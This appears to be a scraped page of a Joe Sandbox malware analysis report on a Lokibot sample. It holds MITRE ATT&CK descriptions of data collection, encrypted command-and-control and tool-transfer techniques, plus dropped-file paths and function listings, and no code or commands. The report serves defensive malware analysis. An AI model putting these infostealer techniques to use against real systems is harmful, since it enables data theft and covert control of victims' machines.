Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EozUxz4ybi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7ec63eecc011967c28496572961d2a7c_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
EozUxz4ybi.exe

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON